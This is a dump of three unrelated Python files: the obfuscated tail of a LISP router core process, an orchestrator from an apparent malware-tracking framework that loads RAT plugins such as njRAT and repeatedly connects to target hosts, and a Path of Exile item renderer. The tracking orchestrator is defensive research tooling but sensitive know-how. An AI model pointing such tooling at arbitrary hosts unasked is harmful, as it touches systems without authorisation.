lisp . lisp_ipc ( i11I1iIiII , O0OOo , "lisp-itr" )
continue
OOOO = lisp . lisp_convert_4to6 ( o0oi1I1I1I )
OOOO = lisp . lisp_address ( lisp . LISP_AFI_IPV6 , "" , 128 , 0 )
if ( OOOO . is_ipv4_string ( o0oi1I1I1I ) ) : o0oi1I1I1I = "::ffff:" + o0oi1I1I1I
OOOO . store_address ( o0oi1I1I1I )
lisp . lisp_send ( lisp_sockets , OOOO , o0o , ooOoOoo000O0O )
return
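# The next routine seeds ./lisp.config from ./lisp.config.example, copying
# lines up to and including the first full "#----#" separator line (the
# template header). A minimal deobfuscated sketch of the same logic, with
# illustrative names:
#
# def copy_example_config():
#     with open("./lisp.config.example") as src, open("./lisp.config", "w") as dst:
#         for line in src.read().split("\n"):
#             dst.write(line + "\n")
#             if len(line) >= 4 and line[0] == "#" and line[-1] == "#":
#                 body = line[1:-2]
#                 if body == "-" * len(body):
#                     break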
def O0O0oOOo0O ( ) :
ii1111iII = open ( "./lisp.config.example" , "r" ) ; iiiiI = ii1111iII . read ( ) ; ii1111iII . close ( )
ii1111iII = open ( "./lisp.config" , "w" )
iiiiI = iiiiI . split ( "\n" )
for OOoO in iiiiI :
ii1111iII . write ( OOoO + "\n" )
if ( len ( OOoO ) >= 4 and OOoO [ 0 ] == "#" and OOoO [ - 1 ] == "#" ) :
o0oO = OOoO [ 1 : - 2 ]
ooOo0 = len ( o0oO ) * "-"
if ( o0oO == ooOo0 ) : break
ii1111iII . close ( )
return
def Ii1i ( bottle_port ) :
global Oo0oO0ooo
global o00oOoo
global O0OOo
global II1Iiii1111i
global i1IIi11111i
global o000o0o00o0Oo
lisp . lisp_i_am ( "core" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "core-process starting up" )
lisp . lisp_uptime = lisp . lisp_get_timestamp ( )
lisp . lisp_version = commands . getoutput ( "cat lisp-version.txt" )
Oo0oO0ooo = commands . getoutput ( "cat lisp-build-date.txt" )
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
lisp . lisp_ipc_lock = multiprocessing . Lock ( )
if ( os . path . exists ( "lisp.py" ) ) : lisp . lisp_version += "+"
iIi11IiiiII11 = "0.0.0.0" if lisp . lisp_is_raspbian ( ) else "0::0"
if ( os . getenv ( "LISP_ANYCAST_MR" ) == None or lisp . lisp_myrlocs [ 0 ] == None ) :
o00oOoo = lisp . lisp_open_listen_socket ( iIi11IiiiII11 ,
str ( lisp . LISP_CTRL_PORT ) )
else :
iIi11IiiiII11 = lisp . lisp_myrlocs [ 0 ] . print_address_no_iid ( )
o00oOoo = lisp . lisp_open_listen_socket ( iIi11IiiiII11 ,
str ( lisp . LISP_CTRL_PORT ) )
lisp . lprint ( "Listen on {}, port 4342" . format ( iIi11IiiiII11 ) )
if ( lisp . lisp_external_data_plane ( ) == False ) :
o000o0o00o0Oo = lisp . lisp_open_listen_socket ( iIi11IiiiII11 ,
str ( lisp . LISP_DATA_PORT ) )
lisp . lprint ( "Listen on {}, port 4341" . format ( iIi11IiiiII11 ) )
O0OOo = lisp . lisp_open_send_socket ( "lisp-core" , "" )
O0OOo . settimeout ( 3 )
II1Iiii1111i = lisp . lisp_open_listen_socket ( "" , "lisp-core-pkt" )
i1IIi11111i = [ o00oOoo , o00oOoo ,
O0OOo ]
threading . Thread ( target = oOoO ,
args = [ II1Iiii1111i , i1IIi11111i ] ) . start ( )
if ( os . path . exists ( "./lisp.config" ) == False ) :
lisp . lprint ( ( "./lisp.config does not exist, creating a copy " + "from lisp.config.example" ) )
O0O0oOOo0O ( )
i11ii ( o00oOoo )
threading . Thread ( target = lispconfig . lisp_config_process ,
args = [ O0OOo ] ) . start ( )
threading . Thread ( target = Oooo0Oo00o ,
args = [ bottle_port ] ) . start ( )
threading . Thread ( target = o0oO00OOo0oO , args = [ ] ) . start ( )
threading . Thread ( target = oO0o000oOO ,
args = [ O0OOo ] ) . start ( )
threading . Thread ( target = o0O0OOOo0 ) . start ( )
return ( True )
def I1iiII1 ( ) :
lisp . lisp_close_socket ( O0OOo , "lisp-core" )
lisp . lisp_close_socket ( II1Iiii1111i , "lisp-core-pkt" )
lisp . lisp_close_socket ( o00oOoo , "" )
lisp . lisp_close_socket ( o000o0o00o0Oo , "" )
return
def i11ii ( lisp_socket ) :
ii1111iII = open ( "./lisp.config" , "r" ) ; iiiiI = ii1111iII . read ( ) ; ii1111iII . close ( )
iiiiI = iiiiI . split ( "\n" )
II11II = False
for OOoO in iiiiI :
if ( OOoO [ 0 : 2 ] == "#-" and OOoO [ - 2 : ] == "-#" ) : break
if ( OOoO == "" or OOoO [ 0 ] == "#" ) : continue
if ( OOoO . find ( "decentralized-push-xtr = yes" ) == - 1 ) : continue
II11II = True
break
if ( II11II == False ) : return
Ii1 = [ ]
o0OOOoo0000 = False
for OOoO in iiiiI :
if ( OOoO [ 0 : 2 ] == "#-" and OOoO [ - 2 : ] == "-#" ) : break
if ( OOoO == "" or OOoO [ 0 ] == "#" ) : continue
if ( OOoO . find ( "lisp map-server" ) != - 1 ) :
o0OOOoo0000 = True
continue
if ( OOoO [ 0 ] == "}" ) :
o0OOOoo0000 = False
continue
if ( o0OOOoo0000 and OOoO . find ( "address = " ) != - 1 ) :
oOOOO = OOoO . split ( "address = " ) [ 1 ]
OoOOoo0 = int ( oOOOO . split ( "." ) [ 0 ] )
if ( OoOOoo0 >= 224 and OoOOoo0 < 240 ) : Ii1 . append ( oOOOO )
if ( Ii1 == [ ] ) : return
iIi = commands . getoutput ( 'ifconfig eth0 | egrep "inet "' )
if ( iIi == "" ) : return
oO0o00o000Oo0 = iIi . split ( ) [ 1 ]
Ii111iIi1iIi = socket . inet_aton ( oO0o00o000Oo0 )
for oOOOO in Ii1 :
lisp_socket . setsockopt ( socket . SOL_SOCKET , socket . SO_REUSEADDR , 1 )
lisp_socket . setsockopt ( socket . IPPROTO_IP , socket . IP_MULTICAST_IF , Ii111iIi1iIi )
IIii1Ii = socket . inet_aton ( oOOOO ) + Ii111iIi1iIi
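# The membership request handed to IP_ADD_MEMBERSHIP below is a packed
# struct ip_mreq: the 4-byte multicast group address followed by the
# 4-byte local interface address, both produced by socket.inet_aton().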
lisp_socket . setsockopt ( socket . IPPROTO_IP , socket . IP_ADD_MEMBERSHIP , IIii1Ii )
lisp . lprint ( "Setting multicast listen socket for group {}" . format ( oOOOO ) )
return
III1I11II11I = int ( sys . argv [ 1 ] ) if ( len ( sys . argv ) > 1 ) else 8080
if ( Ii1i ( III1I11II11I ) == False ) :
lisp . lprint ( "lisp_core_startup() failed" )
lisp . lisp_print_banner ( "lisp-core abnormal exit" )
exit ( 1 )
while ( True ) :
O0OOO , II11iIiIIIiI , o0o , ooOoOoo000O0O = lisp . lisp_receive ( o00oOoo , False )
if ( II11iIiIIIiI == "" ) : break
II11iIiIIIiI = lisp . lisp_convert_6to4 ( II11iIiIIIiI )
O0O00O0Oo0 ( i1IIi11111i , II11iIiIIIiI , o0o , ooOoOoo000O0O )
I1iiII1 ( )
lisp . lisp_print_banner ( "lisp-core normal exit" )
exit ( 0 )
|
orchestrator.py | #!/usr/bin/env python3
import argparse
import yaml
import importlib
import threading
import time
import random
from puppet_rat import PuppetRAT
from typing import List, Tuple, Type
def import_puppet_rat(full_name: str) -> Type[PuppetRAT]:
module_name, class_name = full_name.rsplit('.', 1)
module = importlib.import_module(module_name)
if not module:
raise ModuleNotFoundError(module_name)
return getattr(module, class_name)
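# Example use, mirroring the --plugin-name help text below (the address and
# port here are placeholders):
# rat_cls = import_puppet_rat('plugins.njrat.NjRAT')
# server = rat_cls('192.0.2.10', 4444)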
def connect(target_ip: str, target_port: int, plugin_name: str) -> None:
thread = threading.Thread(target=_connect, args=(target_ip, target_port, plugin_name))
thread.start()
def _connect(target_ip: str, target_port: int, plugin_name: str) -> None:
rat_server = import_puppet_rat(plugin_name)
server = rat_server(target_ip, target_port)
while True:
try:
server.connect()
server.register()
server.loop()
except Exception:
server.logger.exception('')
time.sleep(random.randint(1, 30))
def connect_targets(targets: List[Tuple[str, Tuple[str, int, str]]]) -> None:
for target_name, target in targets:
print(f'[*] Connecting {target_name}...')
connect(target['ip'], target['port'], target['plugin'])
def main():
parser = argparse.ArgumentParser(description="=== [M]aster[O]f[P]uppets ===\r\nhttps://github.com/intezer/mop\r\nAdvanced Malware Tracking Framework",
formatter_class=lambda prog: argparse.RawTextHelpFormatter(prog, width=1024))
parser.add_argument('--target-ip', dest='target_ip', type=str, default=None, help='Target ip address to connect')
parser.add_argument('--target-port', dest='target_port', type=int, default=None, help='Target port to connect')
parser.add_argument('--plugin-name', dest='plugin_name', type=str, default=None,
help='Plugin to use, please specify full name(for example "plugins.njrat.NjRAT")')
parser.add_argument('--targets-config', dest='targets_config', type=str, default=None, help='Config file with multiple targets')
args = parser.parse_args()
if args.target_ip:
connect(args.target_ip, args.target_port, args.plugin_name)
elif args.targets_config:
with open(args.targets_config) as fh:
config = yaml.load(fh, Loader=yaml.FullLoader)
connect_targets(config['targets'].items())
else:
parser.error('No action requested, add --target-ip or --targets-config')
if __name__=='__main__':
main()
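# A --targets-config file is YAML shaped like the structure consumed by
# connect_targets(); the names and addresses here are placeholders:
#
# targets:
#   example_campaign:
#     ip: 192.0.2.10
#     port: 4444
#     plugin: plugins.njrat.NjRAT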
|
utils.py | import binascii
import html
import json as js
import math
import os
import re
import threading
import unicodedata
import xml.etree.cElementTree as Etree
from collections import defaultdict
from collections import namedtuple
from io import BytesIO
from queue import Queue
import urllib3
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from PIL import ImageOps
from bs4 import BeautifulSoup as Soup
from poe.exceptions import AbsentItemBaseException
from poe.exceptions import OutdatedPoBException, RequestException
from poe.models import Weapon, Armour, PassiveSkill, Gem
from poe.price import ItemPriceQuery, CurrencyQuery
from .constants import *
re_range = re.compile(r'\(.+?\)')
# Simple cursor class that handles moving around the image and avoids the
# hassle of manually tracking position with repeated adds and subtracts.
def strip_unicode(text: str):
return ''.join((c for c in unicodedata.normalize('NFD', text) if unicodedata.category(c) != 'Mn'))
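# e.g. strip_unicode('café') -> 'cafe': NFD decomposition splits accented
# characters into a base letter plus combining marks (category 'Mn'),
# which are then dropped.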
class Cursor:
def __init__(self, x_start):
self.x = 0
self.y = 0
self.x_start = x_start
# Return current pos of cursor
@property
def pos(self):
return self.x, self.y
def move_x(self, quantity):
self.x += quantity
def move_y(self, quantity):
self.y += quantity
def reset_x(self):
self.x = self.x_start
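# Typical use while rendering (illustrative): start from the horizontal
# centre, back up by half the width of the text about to be drawn, draw,
# then advance the y position:
# cur = Cursor(width // 2)
# cur.reset_x()
# cur.move_x(-(font.getsize(text)[0] // 2))
# draw.text(cur.pos, text)
# cur.move_y(font.getsize(text)[1])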
# Relative paths depend on the working directory, so anchor to this file
_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'data')
# Find links wrapped in [[]] returned by Gamepedia
reg = re.compile(r'\[\[[^\]]+\]\]')
try:
with open(f"{_dir}/keystones.json") as f:
keystones = js.load(f)
with open(f"{_dir}/ascendancy.json") as f:
asc_nodes = js.load(f)
with open(f"{_dir}/items.json") as f:
items = js.load(f)
except Exception:
pass
def unescape_to_list(props, ret_matches=False):
matches = reg.findall(props)
has_table = Soup(html.unescape(props), 'html.parser').select('table.mw-collapsed tr')
if not has_table:
for match in set(matches):
if '|' in match:
props = props.replace(match, match.split('|')[1].strip(']]'))
else:
props = props.replace(match, match.strip('[[]]'))
prop_list = html.unescape(props).replace('<br />', '<br>').split('<br>')
prop_list = [x.replace('<em class="tc -corrupted">', '').replace('</em>', '') for x in prop_list]
else:
# select() returns the list of matching <tr> tags, so iterate rows directly
prop_list = [x.text for x in has_table]
if ret_matches:
return prop_list, matches
return prop_list
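# e.g. a wiki property string such as
# '[[Physical|Physical Damage]]: 10<br>Corrupted'
# comes back as ['Physical Damage: 10', 'Corrupted']: the [[target|label]]
# links are unwrapped and <br> acts as the line separator.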
class ItemRender:
def __init__(self, flavor):
self.flavor = flavor.lower()
self.font = ImageFont.truetype(f'{_dir}//Fontin-SmallCaps.ttf', 15)
self.lore_font = ImageFont.truetype(f'{_dir}//Fontin-SmallCapsItalic.ttf', 15)
self.header_font = ImageFont.truetype(f'{_dir}//Fontin-SmallCaps.ttf', 20)
self.namebar_left = Image.open(f'{_dir}//{self.flavor}_namebar_left.png').convert('RGBA')
self.namebar_right = Image.open(f'{_dir}//{self.flavor}_namebar_right.png').convert('RGBA')
self.namebar_trans = Image.open(f'{_dir}//{self.flavor}_namebar_trans.png').convert('RGBA')
self.separator = Image.open(f'{_dir}//{self.flavor}_separator.png').convert('RGBA')
self.div_frame = Image.open(f'{_dir}//div_frame.png').convert('RGBA')
self.elder_badge = Image.open(f'{_dir}//elder_badge.png').convert('RGBA')
self.shaper_badge = Image.open(f'{_dir}//shaper_badge.png').convert('RGBA')
self.redeemer_badge = Image.open(f'{_dir}//redeemer_badge.png').convert('RGBA')
self.crusader_badge = Image.open(f'{_dir}//crusader_badge.png').convert('RGBA')
self.hunter_badge = Image.open(f'{_dir}//hunter_badge.png').convert('RGBA')
self.warlord_badge = Image.open(f'{_dir}//warlord_badge.png').convert('RGBA')
self.passive_frame = Image.open(f'{_dir}//passive_frame.png').convert('RGBA')
self.keystone_frame = Image.open(f'{_dir}//keystone_frame.png').convert('RGBA')
self.notable_frame = Image.open(f'{_dir}//notable_frame.png').convert('RGBA')
self.ascendancy_frame = Image.open(f'{_dir}//ascendancy_frame.png').convert('RGBA')
self.shaper_backgrounds = {
('1', '1'): Image.open(f'{_dir}//shaper_bg_1x1.png').convert('RGBA'),
('1', '2'): Image.open(f'{_dir}//shaper_bg_1x2.png').convert('RGBA'),
('1', '3'): Image.open(f'{_dir}//shaper_bg_1x3.png').convert('RGBA'),
('1', '4'): Image.open(f'{_dir}//shaper_bg_1x4.png').convert('RGBA'),
('2', '1'): Image.open(f'{_dir}//shaper_bg_2x1.png').convert('RGBA'),
('2', '2'): Image.open(f'{_dir}//shaper_bg_2x2.png').convert('RGBA'),
('2', '3'): Image.open(f'{_dir}//shaper_bg_2x3.png').convert('RGBA'),
('2', '4'): Image.open(f'{_dir}//shaper_bg_2x4.png').convert('RGBA'),
}
self.elder_backgrounds = {
('1', '1'): Image.open(f'{_dir}//elder_bg_1x1.png').convert('RGBA'),
('1', '3'): Image.open(f'{_dir}//elder_bg_1x3.png').convert('RGBA'),
('1', '4'): Image.open(f'{_dir}//elder_bg_1x4.png').convert('RGBA'),
('2', '1'): Image.open(f'{_dir}//elder_bg_2x1.png').convert('RGBA'),
('2', '2'): Image.open(f'{_dir}//elder_bg_2x2.png').convert('RGBA'),
('2', '3'): Image.open(f'{_dir}//elder_bg_2x3.png').convert('RGBA'),
('2', '4'): Image.open(f'{_dir}//elder_bg_2x4.png').convert('RGBA'),
}
# A namedtuple to handle properties.
# This works fairly well except for Separators which is kinda hacky
self.prop = namedtuple('Property', ['title', 'text', 'color'])
# I don't know why PIL does this, but spacing with fonts is not consistent,
# so I have to compensate by spacing more after separators and the like.
self.last_action = str()
# Go through our total properties and image to get the image/box size
# I feel the code is a bit redundant considering I have two instances
# of an if-fest, calc_size and sort_stats.
# TODO: reduce redundancy
def calc_size(self, stats, header):
width = self.header_font.getsize(header)[0] + (self.namebar_left.size[0] * 2) + 4
height = 0
last_sep = False
for stat in stats:
if stat.title == "Separator":
height += SEPARATOR_HEIGHT + SEPARATOR_SPACING
last_sep = True
continue
elif stat.title == "Elemental Damage:":
if last_sep:
height += SEPARATOR_SPACING
else:
height += STAT_SPACING
height += STAT_HEIGHT
stat_text = stat.title
for element in stat.text.keys():
stat_text += f" {stat.text[element]}"
last_sep = False
elif stat.title == "Requires":
if last_sep:
height += SEPARATOR_SPACING
else:
height += STAT_SPACING
height += STAT_HEIGHT
stat_text = stat.title
for attr in stat.text.keys():
stat_text += f" {attr.title()} {stat.text[attr]}{'' if list(stat.text.keys())[-1] == attr else ','}"
last_sep = False
elif stat.title == "Lore" or stat.title == "Reminder":
if type(stat.text) is list:
ht = LINE_SPACING
for line in stat.text:
w = self.lore_font.getsize(line)
ht += STAT_HEIGHT
if w[0] > width:
width = w[0]
height += ht + STAT_SPACING
else:
w = self.lore_font.getsize(stat.text)
if w[0] > width:
width = w[0]
height += STAT_HEIGHT
last_sep = False
continue
elif stat.title == "Image":
height += stat.text.size[1] + IMAGE_PADDING
last_sep = False
else:
if last_sep:
height += SEPARATOR_SPACING
else:
height += STAT_SPACING
height += STAT_HEIGHT
stat_text = f"{stat.title}{stat.text}"
last_sep = False
if stat.title != "Image":
# stat_text is assigned by every branch that reaches this point without
# continuing; the "Image" case is excluded by the check above
w = self.font.getsize(stat_text)
else:
w = stat.text.size
if w[0] > width:
width = w[0]
# 34 is the 17px padding from both sides
return width + 34, height + self.namebar_trans.size[1] + 25
def sort_stats(self, item):
stats = list()
separator = self.prop("Separator", None, None)
if not isinstance(item, PassiveSkill):
if 'weapon' in item.tags:
stats.append(self.prop(item.item_class, '', DESC_COLOR))
if item.quality:
stats.append(self.prop("Quality: ", f"+{item.quality}%", PROP_COLOR))
if item.physical_damage:
stats.append(self.prop("Physical Damage: ", item.physical_damage, PROP_COLOR))
elements = {
element.split('_')[0]: getattr(item, element) for element in [
'fire_damage', 'cold_damage', 'lightning_damage'
] if getattr(item, element)
}
if elements:
stats.append(self.prop("Elemental Damage:", elements, None))
if item.chaos_damage:
stats.append(self.prop("Chaos Damage: ", item.chaos_damage, CHAOS_COLOR))
if item.critical_chance:
stats.append(self.prop("Critical Strike Chance: ", item.critical_chance, None))
if item.attack_speed:
stats.append(self.prop("Attacks Per Second: ", item.attack_speed, PROP_COLOR))
if int(item.range):
stats.append(self.prop("Weapon Range: ", item.range, None))
stats.append(separator)
elif 'armour' in item.tags:
if item.quality:
stats.append(self.prop("Quality: ", f"+{item.quality}%", PROP_COLOR))
if item.block:
stats.append(self.prop("Chance To Block: ", f"{item.block}%", PROP_COLOR))
if item.armour:
stats.append(self.prop("Armour: ", item.armour, PROP_COLOR))
if item.evasion:
stats.append(self.prop("Evasion: ", item.evasion, PROP_COLOR))
if item.energy_shield:
stats.append(self.prop("Energy Shield: ", item.energy_shield, PROP_COLOR))
stats.append(separator)
elif 'ring' in item.tags or 'amulet' in item.tags or 'belt' in item.tags:
if item.quality:
stats.append(self.prop("Quality: ", f"+{item.quality}%", PROP_COLOR))
stats.append(separator)
elif 'gem' in item.tags:
stats.append(self.prop(item.gem_tags.replace(',', ', '), '', DESC_COLOR))
# Temp disable for bugged skill_levels table
if item.stats_per_level[0]['mana multiplier']:
stats.append(self.prop("Mana Multiplier: ", f"{item.stats_per_level[0]['mana multiplier']}%", None))
if item.radius:
stats.append(self.prop("Radius: ", item.radius, None))
if not item.is_aura:
# Enlighten Enhance etc only go up to 10
try:
stats.append(self.prop(
"Mana Cost: ", f"({item.stats_per_level[1]['mana cost']}-{item.stats_per_level[20]['mana cost']})", PROP_COLOR)
)
except KeyError:
stats.append(self.prop(
"Mana Cost: ", f"({item.stats_per_level[1]['mana cost']}-{item.stats_per_level[10]['mana cost']})", PROP_COLOR)
)
else:
stats.append(self.prop("Mana Reserved: ", f"{item.stats_per_level[0]['mana cost']}%", None))
# Enlighten Enhance etc only go up to 10
try:
if item.stats_per_level[20]['stored uses']:
stats.append(self.prop("Stored Uses", {item.stats_per_level[20]['stored uses']}, None))
except KeyError:
if item.stats_per_level[10]['stored uses']:
stats.append(self.prop("Stored Uses", {item.stats_per_level[10]['stored uses']}, None))
if item.stats_per_level[0]['cooldown']:
stats.append(self.prop("Cooldown Time: ", f"{item.stats_per_level[0]['cooldown']} sec", None))
if item.cast_time:
stats.append(self.prop("Cast Time: ", f"{item.cast_time} sec", None))
if item.stats_per_level[0]['critical strike chance']:
stats.append(
self.prop("Critical Strike Chance: ", f"{item.stats_per_level[0]['critical strike chance']}%", None)
)
if item.stats_per_level[0]['damage effectiveness']:
stats.append(
self.prop("Damage Effectiveness: ", f"{item.stats_per_level[0]['damage effectiveness']}%", None)
)
stats.append(separator)
elif item.base == 'Prophecy':
if len(item.lore.split(' ')) > 7:
lore = item.lore.split(' ')
sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
for line in sep_lore:
stats.append(self.prop('Lore', ' '.join(line), UNIQUE_COLOR))
else:
stats.append(self.prop('Lore', item.lore, UNIQUE_COLOR))
stats.append(separator)
obj_list, matches = unescape_to_list(item.objective, ret_matches=True)
if 'while holding' in obj_list[0]:
item_name = matches[3].split('|')[1].strip(']]')
pre_holding = obj_list[0].split(' while holding ')[0]
new_obj = f"{pre_holding} while holding {item_name}"
else:
new_obj = obj_list[0]
if len(new_obj.split(' ')) > 7:
obj_split = new_obj.split(' ')
obj_sep = [obj_split[x:x + 7] for x in range(0, len(obj_split), 7)]
for line in obj_sep:
stats.append(self.prop(' '.join(line), '', None))
else:
stats.append(self.prop(new_obj, '', None))
stats.append(separator)
stats.append(self.prop("Seal Cost: ", item.seal_cost, DESC_COLOR))
if item.requirements.has_reqs and item.base != "Prophecy":
reqs = {}
if item.requirements.level:
reqs['level'] = item.requirements.level
if item.requirements.str:
reqs['str'] = item.requirements.str
if item.requirements.dex:
reqs['dex'] = item.requirements.dex
if item.requirements.int:
reqs['int'] = item.requirements.int
stats.append(self.prop("Requires", reqs, None))
stats.append(separator)
try:
if item.enchant:
for enchant in item.enchant:
stats.append(self.prop(enchant, '', CRAFTED))
stats.append(separator)
except AttributeError:
pass
if 'gem' in item.tags:
if len(item.description.split(' ')) > 7:
desc = item.description.split(' ')
description = [desc[x:x + 7] for x in range(0, len(desc), 7)]
for line in description:
stats.append(self.prop(' '.join(line), '', GEM_COLOR))
else:
stats.append(self.prop(item.description, '', GEM_COLOR))
stats.append(separator)
if item.quality_bonus:
stats.append(self.prop("Per 1% Quality:", "", DESC_COLOR))
if '<br>' in item.quality_bonus:
for bonus in item.quality_bonus.split('<br>'):
stats.append(self.prop(bonus, "", PROP_COLOR))
else:
stats.append(self.prop(item.quality_bonus, "", PROP_COLOR))
stats.append(separator)
stat_text = item.stat_text.split("<br>")
for stat in stat_text:
if len(stat.split(' ')) > 7:
st = stat.split(' ')
sep_stat = [st[x:x + 7] for x in range(0, len(st), 7)]
for sep in sep_stat:
stats.append(self.prop(' '.join(sep), "", PROP_COLOR))
else:
stats.append(self.prop(stat, "", PROP_COLOR))
stats.append(separator)
stats.append(self.prop("Gem Help", "Place into an item socket of the right", DESC_COLOR))
stats.append(self.prop("Gem Help", "colour to gain this skill. Right click to", DESC_COLOR))
stats.append(self.prop("Gem Help", "remove from a socket.", DESC_COLOR))
if 'gem' not in item.tags and item.base != "Prophecy":
if item.implicits:
implicits = unescape_to_list(item.implicits)
else:
implicits = None
if item.explicits:
explicits = unescape_to_list(item.explicits)
else:
explicits = None
if explicits and explicits[0].startswith('{'):
implicits = [explicits[0]]
explicits.pop(0)
if implicits:
for implicit in implicits:
if "{crafted}" in implicit or "(enchant)" in implicit:
stats.append(self.prop(implicit.replace('{crafted}', '').replace('(enchant)', ''),
'', CRAFTED))
stats.append(separator)
else:
stats.append(self.prop(implicit.replace('(implicit)', ''), '', PROP_COLOR))
stats.append(separator)
if explicits:
for explicit in explicits:
if explicit.lower() == "corrupted":
stats.append(self.prop(explicit, '', CORRUPTED))
elif "(crafted)" in explicit or "{crafted}" in explicit:
stats.append(self.prop(explicit.replace('{crafted}', '').replace(' (crafted)', ''),
'', CRAFTED))
else:
stats.append(self.prop(explicit, '', PROP_COLOR))
if item.lore:
if stats[-1] is not separator:
stats.append(separator)
lore = self.prop('Lore', unescape_to_list(item.lore), UNIQUE_COLOR)
stats.append(lore)
if item.icon:
http = urllib3.PoolManager()
def ico(icon):
r = http.request('GET', icon, preload_content=False)
im = Image.open(BytesIO(r.read()))
im = im.convert('RGBA')
return im
try:
if item.skill_icon:
stats.append(self.prop('Image', ico(item.skill_icon), None))
except AttributeError:
pass
stats.append(self.prop('Image', ico(item.icon), None))
else:
if item.name:
stats.append(self.prop('', item.name, DESC_COLOR))
passive_type = None
if item.asc_class:
passive_type = f"{item.asc_class} Notable Passive Skill"
elif item.is_notable:
passive_type = "Notable Passive Skill"
elif item.is_keystone:
passive_type = "Keystone"
stats.append(self.prop(passive_type, '', NORMAL_COLOR))
for line in unescape_to_list(item.stat_text):
stats.append(self.prop(line, '', PROP_COLOR))
if item.icon:
http = urllib3.PoolManager()
def ico(icon):
r = http.request('GET', icon, preload_content=False)
im = Image.open(BytesIO(r.read()))
im = im.convert('RGBA')
return im
try:
# skill_icon only exists on some models; the AttributeError is handled below
if item.skill_icon:
stats.append(self.prop('Image', ico(item.skill_icon), None))
except AttributeError:
pass
stats.append(self.prop('Image', ico(item.icon), None))
if item.reminder_text:
lines = unescape_to_list(item.reminder_text)
for line in lines:
if len(line.split(' ')) > 7:
lore = line.split(' ')
sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
for set_line in sep_lore:
stats.append(self.prop('Reminder', ' '.join(set_line), DESC_COLOR))
else:
stats.append(self.prop("Reminder", line, DESC_COLOR))
if item.flavor_text:
if len(item.flavor_text.split(' ')) > 7:
lore = item.flavor_text.split(' ')
sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
for line in sep_lore:
stats.append(self.prop('Lore', ' '.join(line), UNIQUE_COLOR))
else:
stats.append(self.prop("Lore", item.flavor_text, UNIQUE_COLOR))
return stats
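# Rendering pipeline: sort_stats() builds the ordered Property list,
# calc_size() walks that list to size the canvas, and render() /
# render_divcard() draw it.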
def render_divcard(self, card):
http = urllib3.PoolManager()
r = http.request('GET', card.card_art, preload_content=False)
art = Image.open(BytesIO(r.read()))
art = art.convert('RGBA')
item = Image.new('RGBA', self.div_frame.size, (255, 0, 0, 0))
cur = Cursor(self.div_frame.size[0] // 2)
cur.reset_x()
cur.move_x((art.size[0] // 2) * -1)
cur.move_y(47)
item.alpha_composite(art, cur.pos)
item.alpha_composite(self.div_frame, (0, 0))
cur.reset_x()
d = ImageDraw.Draw(item)
cur.y = 0
cur.move_y(20)
header_font = ImageFont.truetype(f'{_dir}//Fontin-SmallCaps.ttf', 20)
cur.move_x((header_font.getsize(card.name)[0] // 2) * -1)
d.text(cur.pos, card.name, fill='black', font=header_font)
cur.reset_x()
cur.x = 77
cur.y = 316
cur.move_x((self.font.getsize(card.stack_size)[0] // 2) * -1)
d.text(cur.pos, card.stack_size, fill=None, font=self.font)
cur.y = 384
cur.reset_x()
fill = flavor_color[card.reward_flavor]
cur.move_x((self.font.getsize(card.reward)[0] // 2) * -1)
d.text(cur.pos, card.reward, fill=fill, font=self.font)
cur.reset_x()
if card.is_corrupted:
cur.y = 384 + self.font.getsize(card.reward)[1] + 6
cur.move_x((self.font.getsize("Corrupted")[0] // 2) * -1)
d.text(cur.pos, "Corrupted", fill=CORRUPTED, font=self.font)
cur.reset_x()
cur.y = 536
first_lore = unescape_to_list(card.lore)
for first_line in first_lore:
text = first_line
if len(text.split(' ')) > 7:
lore = text.split(' ')
sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
for line in sep_lore:
joined_line = ' '.join(line)
cur.move_y(STAT_SPACING)
cur.move_x((self.font.getsize(joined_line)[0] // 2) * -1)
d.text(cur.pos, joined_line, fill=UNIQUE_COLOR, font=self.lore_font)
cur.move_y(self.lore_font.getsize(joined_line)[1])
cur.reset_x()
else:
cur.move_y(STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
d.text(cur.pos, text, fill=UNIQUE_COLOR, font=self.lore_font)
cur.move_y(self.lore_font.getsize(text)[1])
cur.reset_x()
return item
def render(self, poe_item):
stats = self.sort_stats(poe_item)
fill = flavor_color[self.flavor]
try:
if self.header_font.getsize(poe_item.name)[0] > self.header_font.getsize(poe_item.base)[0]:
header = poe_item.name
else:
header = poe_item.base
except (AttributeError, TypeError):
header = poe_item.name
box_size = self.calc_size(stats, header)
center_x = box_size[0] // 2
item = Image.new('RGBA', box_size, color='black')
cur = Cursor(center_x)
if not isinstance(poe_item, PassiveSkill):
try:
if poe_item.influences:
apply_influences = []
for influence in poe_item.influences:
if influence == "shaper":
apply_influences.append(self.shaper_badge)
elif influence == "elder":
apply_influences.append(self.elder_badge)
elif influence == "redeemer":
apply_influences.append(self.redeemer_badge)
elif influence == "crusader":
apply_influences.append(self.crusader_badge)
elif influence == "hunter":
apply_influences.append(self.hunter_badge)
elif influence == "warlord":
apply_influences.append(self.warlord_badge)
if poe_item.rarity.lower() in ['rare', 'unique', 'relic']:
self.namebar_left.alpha_composite(apply_influences[0], (8, 18))
if len(apply_influences) > 1:
self.namebar_right.alpha_composite(apply_influences[1], (9, 18))
else:
self.namebar_right.alpha_composite(apply_influences[0], (9, 18))
else:
self.namebar_left.alpha_composite(apply_influences[0], (4, 6))
if len(apply_influences) > 1:
self.namebar_right.alpha_composite(apply_influences[1], (1, 6))
else:
self.namebar_right.alpha_composite(apply_influences[0], (1, 6))
except AttributeError:
pass
item.paste(self.namebar_left, cur.pos)
cur.move_x(self.namebar_left.size[0])
transformed_namebar = self.namebar_trans.resize((item.size[0] - (self.namebar_left.size[0] * 2),
self.namebar_trans.size[1]))
item.paste(transformed_namebar, cur.pos)
cur.move_x(transformed_namebar.size[0])
item.paste(self.namebar_right, cur.pos)
cur.reset_x()
d = ImageDraw.Draw(item)
cur.move_y(8)
cur.move_x((self.header_font.getsize(poe_item.name)[0] // 2) * -1)
d.text(cur.pos, poe_item.name, fill=fill, font=self.header_font)
if not isinstance(poe_item, PassiveSkill):
cur.move_y(2 + self.header_font.getsize(poe_item.name)[1])
else:
cur.move_y(self.header_font.getsize(poe_item.name)[1] // 2)
cur.reset_x()
if not isinstance(poe_item, PassiveSkill):
